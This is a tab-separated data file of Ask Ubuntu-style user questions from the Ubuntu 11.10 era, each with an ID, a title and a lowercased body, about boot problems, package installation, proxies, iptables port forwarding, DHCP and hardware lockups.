92375	black screen booting	i tried to boot ubuntu from usb stick , but it gives me black screen right after booting , the screen goes off , and i can hear the welcome sound , i read about using nomodeset but i could n't figure out how to do that , because i did n't install ubuntu yet , the problem comes with usb , i tried to hot f6 and f10 but did n't work my laptop is hp g6 i 'm trying to boot ubuntu 11.10 thanks in advcance
92377	installing xulrunner , adding mozilla daily ppa does n't help	i need to install xulrunner so i can use redcar , but am unable to do so . i followed the steps in this question verbatim install xulrunner 2.0 . here 's the output from adding the mozilla ppa : lpeabody @ ubuntu : /var/www/drupal-7.8 $ sudo add-apt-repository ppa : ubuntu-mozilla-daily/ppa you are about to add the following ppa to your system : official ppa for firefox and thunderbird daily builds daily ( or even multiple builds per day ) for various mozilla projects and branches . for questions and bugs with software in this archive , please contact < email address hidden > or visit # ubuntu-mozillateam on freenode . more info : https : //launchpad.net/~ubuntu-mozilla-daily/+archive/ppa press [ enter ] to continue or ctrl-c to cancel adding it executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.n2jgd679hn -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv b34505ea326feaea07e3618def4186fe247510be gpg : requesting key 247510be from hkp server keyserver.ubuntu.com gpg : key 247510be : `` launchpad ppa for ubuntu mozilla daily build team '' not changed gpg : total number processed : 1 gpg : unchanged : 1 lpeabody @ ubuntu : /var/www/drupal-7.8 $ sudo apt-get update ign http : //us.archive.ubuntu.com oneiric inrelease ign http : //extras.ubuntu.com oneiric inrelease ign http : //us.archive.ubuntu.com oneiric-updates inrelease ign http : //us.archive.ubuntu.com oneiric-backports inrelease get:1 http : //extras.ubuntu.com oneiric release.gpg [ 72 b ] hit http : //us.archive.ubuntu.com oneiric release.gpg hit http : //extras.ubuntu.com oneiric release hit http : //us.archive.ubuntu.com oneiric-updates release.gpg hit http : //us.archive.ubuntu.com oneiric-backports release.gpg hit http : //extras.ubuntu.com oneiric/main sources hit http : //extras.ubuntu.com oneiric/main i386 packages ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //us.archive.ubuntu.com oneiric release hit http : //us.archive.ubuntu.com oneiric-updates release hit http : //us.archive.ubuntu.com oneiric-backports release ign http : //extras.ubuntu.com oneiric/main translation-en_us hit http : //us.archive.ubuntu.com oneiric/main sources hit http : //us.archive.ubuntu.com oneiric/restricted sources hit http : //us.archive.ubuntu.com oneiric/universe sources ign http : //extras.ubuntu.com oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric/multiverse sources hit http : //us.archive.ubuntu.com oneiric/main i386 packages hit http : //us.archive.ubuntu.com oneiric/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric/universe i386 packages hit http : //us.archive.ubuntu.com oneiric/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric/main translationindex hit http : //us.archive.ubuntu.com oneiric/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric/restricted translationindex hit http : //us.archive.ubuntu.com oneiric/universe translationindex hit http : //us.archive.ubuntu.com oneiric-updates/main sources hit http : //us.archive.ubuntu.com oneiric-updates/restricted sources hit http : //us.archive.ubuntu.com oneiric-updates/universe sources hit http : //us.archive.ubuntu.com oneiric-updates/multiverse sources hit http : //us.archive.ubuntu.com oneiric-updates/main i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-updates/main translationindex hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-updates/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-updates/universe translationindex hit http : //us.archive.ubuntu.com oneiric-backports/main sources hit http : //us.archive.ubuntu.com oneiric-backports/restricted sources hit http : //us.archive.ubuntu.com oneiric-backports/universe sources hit http : //us.archive.ubuntu.com oneiric-backports/multiverse sources hit http : //us.archive.ubuntu.com oneiric-backports/main i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/restricted i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/universe i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/multiverse i386 packages hit http : //us.archive.ubuntu.com oneiric-backports/main translationindex hit http : //us.archive.ubuntu.com oneiric-backports/multiverse translationindex hit http : //us.archive.ubuntu.com oneiric-backports/restricted translationindex hit http : //us.archive.ubuntu.com oneiric-backports/universe translationindex hit http : //us.archive.ubuntu.com oneiric/main translation-en hit http : //us.archive.ubuntu.com oneiric/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric/restricted translation-en hit http : //us.archive.ubuntu.com oneiric/universe translation-en hit http : //us.archive.ubuntu.com oneiric-updates/main translation-en hit http : //us.archive.ubuntu.com oneiric-updates/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-updates/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-updates/universe translation-en hit http : //us.archive.ubuntu.com oneiric-backports/main translation-en hit http : //us.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //us.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //us.archive.ubuntu.com oneiric-backports/universe translation-en ign http : //security.ubuntu.com oneiric-security inrelease ign http : //ppa.launchpad.net oneiric inrelease ign http : //ppa.launchpad.net oneiric inrelease hit http : //security.ubuntu.com oneiric-security release.gpg hit http : //ppa.launchpad.net oneiric release.gpg hit http : //security.ubuntu.com oneiric-security release get:2 http : //ppa.launchpad.net oneiric release.gpg [ 316 b ] hit http : //ppa.launchpad.net oneiric release hit http : //security.ubuntu.com oneiric-security/main sources get:3 http : //ppa.launchpad.net oneiric release [ 9,788 b ] hit http : //security.ubuntu.com oneiric-security/restricted sources hit http : //security.ubuntu.com oneiric-security/universe sources hit http : //security.ubuntu.com oneiric-security/multiverse sources hit http : //security.ubuntu.com oneiric-security/main i386 packages hit http : //security.ubuntu.com oneiric-security/restricted i386 packages hit http : //security.ubuntu.com oneiric-security/universe i386 packages hit http : //security.ubuntu.com oneiric-security/multiverse i386 packages hit http : //security.ubuntu.com oneiric-security/main translationindex hit http : //security.ubuntu.com oneiric-security/multiverse translationindex hit http : //security.ubuntu.com oneiric-security/restricted translationindex hit http : //security.ubuntu.com oneiric-security/universe translationindex hit http : //ppa.launchpad.net oneiric/main sources hit http : //ppa.launchpad.net oneiric/main i386 packages ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //security.ubuntu.com oneiric-security/main translation-en get:4 http : //ppa.launchpad.net oneiric/main sources [ 1,650 b ] get:5 http : //ppa.launchpad.net oneiric/main i386 packages [ 12.6 kb ] hit http : //security.ubuntu.com oneiric-security/multiverse translation-en hit http : //security.ubuntu.com oneiric-security/restricted translation-en ign http : //ppa.launchpad.net oneiric/main translationindex hit http : //security.ubuntu.com oneiric-security/universe translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en ign http : //ppa.launchpad.net oneiric/main translation-en_us ign http : //ppa.launchpad.net oneiric/main translation-en fetched 24.5 kb in 5s ( 4,853 b/s ) reading package lists ... done after running the update , i attempted to install xulrunner , but get the following back : lpeabody @ ubuntu : /var/www/drupal-7.8 $ sudo apt-get install xulrunner-2.0 xulrunner-2.0-dev xulrunner-2.0-gnome-support xulrunner-dev reading package lists ... done building dependency tree reading state information ... done package xulrunner-2.0-dev is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package xulrunner-2.0 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'xulrunner-2.0 ' has no installation candidate e : package 'xulrunner-2.0-dev ' has no installation candidate e : unable to locate package xulrunner-2.0-gnome-support e : could n't find any package by regex 'xulrunner-2.0-gnome-support' e : unable to locate package xulrunner-dev if you need to know anything else please specify , i will be prompt with my answers if asked during the next 2 hours ... so 2am edt .
92379	how do i get permissions to edit system configuration files ?	i ca n't seem to edit and save config files in the root system ( eg : /etc/dhcp/dhcpd.config ) ; it just says `` permission denied '' or the save option is blocked in the text editor . i 'm pretty sure i 'm a root user , but how do i make sure ? if i am a root user , how do i fix this ?
92388	is it possible to log in as another user within an already-running session ?	is it possible to log in as another user within an already-running session in ubuntu 11.10 ( as it was with xephyr or xnest under gdm ) ?
92391	how do i remaster a ubuntu cd into a ubuntu cd with only gnome shell ?	i was wondering if this was possible and easy to do . i want to take my ubuntu 11.10 64bit cd and remaster it so that it will instead be a gnome3 live cd that i can install later install gnome shell with it instead of unity . i know that fedora already comes this way but i do n't like the rpm package format and love the deb package format along with ppa 's . i would also like to change some of the default programs on the cd as well as add other repositories other than the normal default ones . also i would like to include all updates to the files that came with then cd when i was originally made to make it as up to date as possible . thanks for any help on this .
92393	is it safe to install updated intel drivers from the x-swat ppa ?	is it safe to install updated intel drivers for ubuntu 11.10 from the following ppas ? ppa : glasen/intel-driver ppa : ubuntu-x-swat/x-updates here 's my system spec . sony vaio s-series vpcse190x intel core i7-2640m processor ( 2.80ghz / 3.50ghz with turbo boost ) amd radeon hd 6630m ( 1gb ) hybrid graphics with intel hd graphics 3000 please share your experiences .
92395	how to set up a dhcp server ?	i am currently at this stage of setting up dhcp , and id just like to know what this output in terminal means ? i know i have to edit a file but i do not know which one , and i do not know what to put in it . ultimately i would like to set up a dhcp server . matt @ matt-r580-r590 : ~ $ sudo tail /var/log/syslog jan 3 17:35:23 matt-r580-r590 dhcpd : wrote 0 leases to leases file . jan 3 17:35:23 matt-r580-r590 dhcpd : jan 3 17:35:23 matt-r580-r590 dhcpd : no subnet declaration for eth0 ( no ipv4 addresses ) . jan 3 17:35:23 matt-r580-r590 dhcpd : ** ignoring requests on eth0 . if this is not what jan 3 17:35:23 matt-r580-r590 dhcpd : you want , please write a subnet declaration jan 3 17:35:23 matt-r580-r590 dhcpd : in your dhcpd.conf file for the network segment jan 3 17:35:23 matt-r580-r590 dhcpd : to which interface eth0 is attached . ** jan 3 17:35:23 matt-r580-r590 dhcpd : jan 3 17:35:23 matt-r580-r590 dhcpd : jan 3 17:35:23 matt-r580-r590 dhcpd : not configured to listen on any interfaces ! matt @ matt-r580-r590 : ~ $
92400	what 's going wrong with qt creator and preventing me from launching it ?	i am not able to start qt creator . when i start it the following error is given . ( qtcreator:8508 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( qtcreator:8508 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( qtcreator:8508 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( qtcreato:8508 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , connected to accessibility bus at : `` unix : abstract=/tmp/dbus-ih3kwefmku , guid=af07d35df387caee7e8705270000001a '' registered dec : true invalid parent : 0xa4f5b78 sharedtools : :qtsingleapplication ( 0xbfee5be0 , name = `` qtcreator '' ) requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . requesting child objects for an interface that is a virtual child itself . qspiadaptor : :getchild invalid child : qwidget ( 0xa661398 , name = `` qt_scrollarea_viewport '' ) 2 assert : `` interface- > childcount ( ) == children.count ( ) '' in file adaptor.cpp , line 200 aborted
92415	why do i have more users than i should on uptime	on running the uptime command , it tells me that i have 5 users logged in . i do n't understand this since i have on one user registered on this computer . this is the output 11:07:19 up 5 days , 1:11 , 5 users , load average : 0.42 , 0.67 , 0.56
92416	what are the user-friendly pieces in ubuntu , which debian does n't have ?	i 've read this line of `` ubuntu is more user-friendly than debian '' many times , and i wonder where all the differences lie . i do acknowledge that ubuntu is somewhat more friendly for people with weaker computer skills , especially as far as the installation and drivers go . but what else is there ? i am a linux newbie , but i have a bit of experience with managing computers and as soon as i grasped certain glaring differences between the way certain things are on linux and on windows ( the file system , packages , almighty terminal , root ... ) , i ceased to be able to differentiate much between the two distros ( visuals and release cycles aside ) . could you , please , give me some examples of those preconfigurations and services that the fresh debian installation presumably lacks ? for example , when i was using debian and wrote some files to a mounted ntfs partition , i shutdown the os without unmounting first , and the partition was left in a messy state . would the same thing happen in ubuntu , or is there some kind of safety fuse that would prevent this from happening ?
92417	how do i prevent extreme tux racer from changing my desktop resolution ?	i installed the extreme tux racer game in ubuntu 11.10 from the software center but my screen expands abnormally after i start a game . before starting the game : after closing the game
92419	hp pavilion g6 1209 temperature higher than usual and fan working in 11.10	installing ubuntu on this new machine i had various problems , so i asked around ask ubuntu for a solution . this is the latest one ! : d when i start the pc it shows the temperature around 50-55 . when i open chromium it shows 60+ ( 61,62,63 ) . it even gets to 67-68 when multi-tasking 2 apps . the fan is working slightly louder than in windows 7 . talking about windows 7 , the temperature is 45-50 when idle , 50-53 when working in browser . im already loosing it with this machine . you can find specs here it says 'technishe daten ' below the picture . click that tab and you will reach the specs .
92427	setting a system for public use	i am setting a system up for public use i want to set some rules on the usage of computer so that the users are restricted to some particular areas of the system and they do n't play with sensitive options the users will have ftp & remote access to their desktop ( just 2 services ) the users can run some basic commands only ( for example from command line they can only run `` mkdir , rm -rf , & some basics commands ) the users will remain in their home directories & can not go back up from their home directories ( for example user `` one '' can not cd /home , will remain in there home directory so user `` one '' can not see other users in the home directory ) the users can only use specific application ( for example user `` one '' can only use libre office , firefox & some basic applications like calculator etc . ) the users will be restricted for network usage ( for example user `` one '' can only use 100 kb for download and for upload 50 kb ) i am going to set it up on ubuntu . update how do i setup ? , the above 5 points i want to setup for users
92432	how to make ubuntu support touchpad scrolling ?	i have a dell ( inspiron n5110 ) laptop and manual book said that i can scroll using two fingers on the touch-pad and scroll up , down , left , and right it workd in windows but that did n't happen in ubuntu 11.10.how to make this enable ? ? ?
92434	ubuntu or debian package for creating book covers ?	i need to create a book cover , and would like to know what are the possible ways to do that using ubuntu or debian packages -- but i 'm not an expert in graphic design . so far i know of : latex : it would possibly take too long to get all details right ( choosing the right fonts , positioning elements , etc ) scribus : seems to not make common tasks easy ( i could n't easily find a way to centralize text in a frame , or a frame in a page for example ) gimp : a bit too complex maybe . are there any other packages that would make the task easier ? edit : it 's my own book ( self-publishing -- it 's not for a publishing company ) . i 'll probably want one or two images , the title and one or two lines of text .
92437	why does gnome system monitor never tell me what process is actually using the cpu ?	i have an applet in my gnome panel which shows me the current load of my cpu . this is important on my laptop because it 's a slightly older machine , and so knowing when i should let it finish one task before starting another stops me from getting frustrated with it . however , sometimes when the cpu is maxing out at 100 % , and stays there for a while , it can be an indication that something has gone wrong and maybe i should kill the process . however , i 've noticed over years of using ubuntu that the system monitor never really informs me what 's going on . take for example , this screenshot ( the interface is in japanese , but that should n't change the problem ) : just above the system monitor itself is my panel applet , where the box filled with green just to the right of the battery indicator is also indicating 100 % cpu usage . now look at this image : nothing is using any more than 7 % of the cpu . this seems to be very frequently the case - i dare say almost always - that when the cpu is maxing out , i can never see what is actually using those cpu cycles . i have tried using htop at the command line as well , but the results are the same . why does the system monitor always show me 100 % cpu use in general , but never more than a few % when i look at the total of specific processes ? what am i supposed to do when i want to figure out what is using so much cpu time , should i want to to kill runaway processes , or at the very least know what the process is ?
92438	how can i grep through tab completion possibilities ?	when i press tab in a console i get this output display all 2957 possibilities ? ( y or n ) is there any way to use grep on these 2957 possibilities ? i would like to search for all commands with the word `` svn '' in them .
92444	how to install adobe digital editions	how can i install adobe digital editions on ubuntu ? i 've read that this is possible using wine , but i ca n't download the installer from the adobe page ( as this installer is an online flash installer and requires windows ) . ( i need to open the book i have purchased which is currently in .acsm format )
92445	advanced permissions check boxes in nautilus missing	i ca n't get the advanced permissions to show in nautilus . i checked the box /apps/nautilus/preferences/show-advanced-permissions in the configuration editor and it did n't change in nautilus . i 'm still seeing the drop down version . what am i missing ?
92453	how do i install ubuntu on a macbook pro 2011 ( early ) without any third party apps ?	i would like to know if i can install ubuntu on my mbpro without any third party apps . i mean , for example set up bootcamp and in the free partition install ubuntu with no problems , any suggestions ? i dont wan na triple boot osx win7 and ubuntu , just osx and ubuntu . thank you .
92454	resume after suspend leaves glitches using radeon driver and 11.10 . what is a better way of fixing than using 'unity -- replace ' ?	i am using ubuntu oneiric and have kept fully up-to-date with updates . my gpu is a radeon hd6970 , for which i am using the open-source radeon drivers . the only change i have made to the 'default environment ' is forcing the gpu to use a low power profile , by adding 'echo `` low '' > /sys/class/drm/card0/device/power_profile ' to /etc/rc.local . whenever i suspend the machine through ubuntu 's power/settings menu , it sleeps just fine . after waking up however , obvious graphical glitches are present . windows move remarkably less smooth and content in the browser is unreadable , for example . hitting alt+f2 and entering 'unity -- replace ' , although moving all windows to the upper-left corner , fixes this . now i am looking for a more elegant , or at least a more automatic way of getting the job done . on irc i was told to either fix the driver problems or add the aforementioned command in a pm-utils script . i am not sure how to do the latter , let alone the former . any ideas ?
92460	unity 3d not working whereas unity 2d works fine	i have xubuntu 11.10 . today i installed ubuntu-desktop package to install unity graphical environment . unity 2d is working fine but 3d is not . when i log in , i can hear the ubuntu login sound and then the wallpaper loads for few seconds and then a black screen is shown . i could see still my mouse pointer though . any ideas ?
92464	add-apt-repository wont work on proxy	i would like to send an add-apt-repository command via the gnome-terminal on my ubuntu 11.10 laptop that is connected through a proxy ( with username/password ) . following this answer , i edited my apt.conf file : how to install packages with apt-get on a system connected via proxy ? /etc/apt/apt.conf acquire : :http : :proxy `` http : // < username > : < password > @ < proxy > : < port > / '' ; acquire : :ftp : :proxy `` ftp : // < username > : < password > @ < proxy > : < port > / '' ; acquire : :https : :proxy `` https : // < username > : < password > @ < proxy > : < port > / '' ; i can now run apt-get install package-name with no problem , but when i try add-apt-repository , it wo n't work . any suggestions ? sudo add-apt-repository ppa : bumblebee/stable traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 88 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 65 , in get_ppa_info_from_lp lp_page = urlopen ( req ) .read ( ) file `` /usr/lib/python2.7/urllib2.py '' , line 126 , in urlopen return _opener.open ( url , data , timeout ) file `` /usr/lib/python2.7/urllib2.py '' , line 394 , in open response = self._open ( req , data ) file `` /usr/lib/python2.7/urllib2.py '' , line 412 , in _open '_open ' , req ) file `` /usr/lib/python2.7/urllib2.py '' , line 372 , in _call_chain result = func ( *args ) file `` /usr/lib/python2.7/urllib2.py '' , line 1209 , in https_open return self.do_open ( httplib.httpsconnection , req ) file `` /usr/lib/python2.7/urllib2.py '' , line 1171 , in do_open raise urlerror ( err ) urllib2.urlerror : < urlopen error [ errno 8 ] _ssl.c:503 : eof occurred in violation of protocol >
92468	how do i update to the latest version of sass ?	this is really stupid but i 've been googling for an hour now and ca n't find the answer . i 'm on ubuntu 10.10 , and i 'm trying to update to the latest version of sass so that i can use an @ import rule inside an @ media rule . as suggested here ; https : //github.com/nex3/sass/issues/64 , i tried : $ sudo gem install sass -- pre and that seemed to work fine : successfully installed sass-3.2.0.alpha.35 1 gem installed but when i try $ sass -v i get : haml/sass 3.0.9 ( classy cassidy ) which is the old version i had before updating . what am i doing wrong ? $ which gem /usr/bin/gem $ which sass /usr/bin/sass tried the answer : $ sass -v haml/sass 3.0.9 ( classy cassidy ) $ sudo gem uninstall -iax sass removing sass removing sass-convert removing scss successfully uninstalled sass-3.2.0.alpha.35 $ sass -v haml/sass 3.0.9 ( classy cassidy ) ( was expecting an error here ) $ sudo gem install sass -- pre successfully installed sass-3.2.0.alpha.35 1 gem installed installing ri documentation for sass-3.2.0.alpha.35 ... installing rdoc documentation for sass-3.2.0.alpha.35 ... $ sass -v haml/sass 3.0.9 ( classy cassidy ) so it removes the one i successfully installed and leaves the one that actually gets used when i run the sass command . thougts ?
92473	how do i fix 11.10 gui ?	this happens in both gnome and ubuntu . i can log in just fine . but nothing loads . all i see is my background . this happend after i was trying to get my dual screens configured correctly .
92478	toshiba satellite a105 boots 10.10 from live cd and works fine . ( everything works ) when i install it i ca n't get past login	when booting ubuntu 10.10 from the live cd everything works great . toshiba satellite a105-s2071 video card - ati xpress 200m when i run the 10.10 installation routine it installs without errors . when i reboot i get to the login screen . i then login . it makes the boot sound and then i am left with a background screen with a moveable cursor an nothing else . i have no panels , no icons , nothing . if i boot into safe mode the gnome shell loads . i suspect its a video issue but i do n't know where to go from here
92479	mp3 's tagged with `` unknown artist ''	i 'm having the same problem as many others and its pretty frustrating . whereby , mp3s are tagged as `` unknown artist '' . i 'm in my second paid month of the u1 streaming service , and while its good , i still ca n't get past this `` unknown artist '' issue . i 've been using easytag to `` correct '' the id3 tags , but 9x out of 10 , they are already correct . i re-upload the songs over and over again but its no use . what am i doing wrong ? i have have some albums where half the tracks are under `` unknown artist '' and the other half are reporting correctly - yet they all have the same tags ? it 's very annoying . i 've put a fair amount of time in trying to source an answer or a solution that i can handle on my end , but i 'm yet to find one . if you can help , please let me know .
92481	what is a q : reg process ?	my hard disk is often `` woken up '' by an unknown process . and i do n't succeed to decrease the load_cycle_count with hdparm or laptop_mode . so i launched lm_profiler to see what happens . and i saw that : write accesses at 14/600 in lm-profiler run : q : reg write accesses at 38/600 in lm-profiler run : q : reg write accesses at 43/600 in lm-profiler run : q : reg write accesses at 46/600 in lm-profiler run : q : reg write accesses at 55/600 in lm-profiler run : q : reg write accesses at 79/600 in lm-profiler run : q : reg write accesses at 97/600 in lm-profiler run : q : reg what 's the q : reg process ? i found nothing on the web . thanks for your help .
92482	how to *use* hamster with the gnome shell ?	i installed hamster-applet and gnome-shell-extensions-hamster . but i ca n't see how to actually use it efficiently . it looks like this : how can i start tracking time for a specific project from this `` applet '' ?
92483	redirect packages directed to port 5000 to another port	i 'm trying to use eboard to connect to the fics servers ( http : //www.freechess.org ) , but it fails because port 5000 is blocked ( company firewall ) . however , i can connect to the server through the telnet port ( 23 ) : telnet freechess.org 23 ( succeeds ) telnet freechess.org 5000 ( fails ) unfortunately the port number is hardcoded ( see here : http : //ubuntuforums.org/archive/index.php/t-1613075.html ) . i 'd rather not have to hack the source code as the author of that thread ended up doing . can i just forward the port on my local machine using iptables ? i tried : sudo iptables -t nat -a prerouting -i eth0 -p tcp -- dport 5000 -j redirect -- to-port 23 and sudo iptables -t nat -i output -- src 0/0 -p tcp -- dport 5000 -j redirect -- to-ports 23 but these did n't work ... note that : $ sudo iptables -t nat -l chain prerouting ( policy accept ) target prot opt source destination redirect tcp -- anywhere anywhere tcp dpt:5000 redir ports 23 chain input ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination redirect tcp -- anywhere anywhere tcp dpt:5000 redir ports 23 chain postrouting ( policy accept ) target prot opt source destination
92485	what is the ubuntu server 's relationship to lamp ?	alright , i do n't know if it 's a good idea to challenge these two , is there any relation between them ? i understand lampp : it 's the installation of apache , mysql , php and perl ( or python ) on linux . but i do n't quite understand what the ubuntu server is . please , explain me what i can do with ubuntu server and if it has any relation with lampp . ( if yes , is it better than lampp ? ) . thank you .
92491	whole computer freezes randomly when playing using wine	the problem is that when i play gta : vice city or san andreas , for example , the computer may freeze . it happens randomly , i can play several times for half an hour a day and do n't get the freeze and the next day i can get it easily . i tried running with the latest updates ( os , video driver and wine ) and without them on older versions of the stuff , but it does n't matter : i get crashes in each case . running ubuntu 11.10 oneiric ocelot , video card his radeon hd4850 11.12 catalyst , wine 1.3.36 now . in catalyst everything is set to better performance , catalyst ai - advanced . in wine vertex shader is disabled to avoid a game bug ( peds were too dark ) , 'window settings ' are all checked , desktop size is 1920x1080 ( maximum ) . there are two monitors , i 'm playing on # 1 only , they are set to mirror each other . the computer seems to be fully hung up : ctrl+alt+backspace or ctrl+alt+f1 do n't work , but alt+prtscr+r , s , e , i , n , u , b combo reboots the computer .
92492	flash player performance issues	i have serious performance issues with flash on ubuntu 11.10. the problem manifests itself when i try to play large flash files on hosting sites like gorillavids.com and the like . the playback starts normal , and then after 10 minutes or so the frame rate keeps getting lower and lower , until it 's like 2 fps . the whole file gets loaded and audio is fine . this happens on my main rig ( i5 , 8 gb , radeon hd5450 ) and on my laptop ( i3 , 4 gb , intel hd graphics ) . after booting to windows , the files play fine . i have n't had any issues with youtube vids , since they 're generally not that long . i 've tried it with chromium and firefox with the flash player from restricted and with adobe 's flash player , everything behaves the same .
92498	how do i fix these libreoffice unmet dependencies ?	the following packages have unmet dependencies : libreoffice : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed depends : libreoffice-base but it is not going to be installed depends : libreoffice-report-builder-bin but it is not going to be installed depends : ttf-dejavu but it is not going to be installed depends : ttf-sil-gentium-basic but it is not going to be installed depends : libreoffice-filter-mobiledev but it is not going to be installed depends : libreoffice-java-common ( > = 1:3.4.4~ ) but it is not going to be installed libreoffice-base-core : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-calc : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-draw : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-gnome : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-gtk : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-impress : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-math : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed libreoffice-writer : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed python-uno : depends : libreoffice-core ( = 1:3.4.4-0ubuntu1 ) but 1:3.4.3-3ubuntu2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
92499	command to change gnome 3 setting system-wide ( for all users ) ?	iâ´m looking for a command to set / change gnome 3 parameter for all users . gsettings works fine but only for one user .
92502	how to share internet between a ubuntu and xp ?	i am having an internet connection which i have to share via lan to my friends . i have installed ubuntu 11.10 but the problem is that i ca n't share the connection . as i used to do i gave eth0 ( the interface connected to my friends ) the name share and in the network settings , gave the option share with other computers . but the problem is that when i save it , the `` share '' is not connecting but the name of my eth0 lan card is showing constantly as connected and not connected . when i configured `` share '' with other options in the drop down ( manual , link local only etc . ) there was no problem . guys please help me ... .. we have got no other options for sharing the internet connection ... ..
92505	forked-daapd does n't work and i do n't know why !	i 'm using ubuntu server 11.10 , i 've installed forked-daapd and this is its config file : general { # username uid = `` musica '' logfile = `` /var/log/forked-daapd.log '' # database location db_path = `` /var/cache/forked-daapd/songs3.db '' # available levels : fatal , log , warning , info , debug , spam loglevel = spam # admin password for the non-existent web interface admin_password = `` unused '' # enable/disable ipv6 ipv6 = no } # library configuration library { # name of the library as displayed by the clients # % h : hostname , % v : version name = `` musica % h '' # tcp port to listen on . default port is 3689 ( daap ) port = 3689 # password for the library . optional . # password = `` '' # directories to index directories = { `` /media/musica/ '' } # directories containing compilations # matches anywhere in the path ( not a regexp , though ) # compilations = { `` /compilations/ '' } # should itunes metadata override ours ? # itunes_overrides = true # formats : mp4a , mp4v , mpeg , alac , flac , mpc , ogg , wma , wmal , wmav , aif , wav # formats that should never be transcoded # no_transcode = { `` alac '' , `` mp4a '' } # formats that should always be transcoded force_transcode = { `` ogg '' , `` flac '' } } # local audio output audio { # airtunes name - used in the speaker list in remote nickname = `` computer '' # audio device name for local audio output # card = `` default '' # mixer channel to use for volume control - alsa/linux only # if not set , pcm will be used if available , otherwise master . # mixer = `` '' } # airport express device # apex `` apex '' { # airtunes password # password = `` s1kr3t '' # } when i start forked-daapd this is the output : root @ petra : /media/video # service forked-daapd restart restarting rsp and daap media server : main : forked media server version 0.19 taking off main : initialized with gcrypt 1.5.0 forked-daapd . and this is the log file : [ 2012-01-03 17:18:29 ] main : forked media server version 0.19 taking off [ 2012-01-03 17:18:29 ] main : initialized with gcrypt 1.5.0 [ 2012-01-03 17:18:29 ] main : pid : 12319 [ 2012-01-03 17:18:29 ] main : mdns init [ 2012-01-03 17:18:29 ] mdns : initializing avahi mdns the problem is banshee and rhythmbox do n't see the daap server and if i manually add the daap share nothing happen ! what can i do ? i 've already changed the loglevel = spam but forked-daapd does n't show any additional information in the log file
92507	whole computer locks up when on docking station using wireless	i have a lenovo t410 laptop running ubuntu 11.10 . at the office , i have it on a ( lenovo ) docking station to which is attached an external monitor , keyboard , mouse , and external hard drive . i do n't have a wired internet connection , so i connect wirelessly . on occasion ( about twice in three days ) the entire computer will randomly lock up . the only way to proceed is to do a hard shutdown and reboot . my computer does n't lock up like this anywhere else . i do n't know where to begin to troubleshoot this problem . i suspect it has something to do with the hardware configuration ( involving the docking station ) and the fact that my only network connection is via wireless . the reason i think this is that my computer has real difficulty maintaining the wireless connection at the office ( i 've pulled many hairs trying to troubleshoot this problem as well , since it does n't have any trouble maintaining wireless connections anywhere else ) and i 've noticed that some software does n't play nice when it does n't have a connection to the internet ( e.g. , banshee ) . i know this is n't much to go on . if someone could help me solve the problem , that would be great , but i 'm really just looking for some suggestions as to how to go about troubleshooting it .
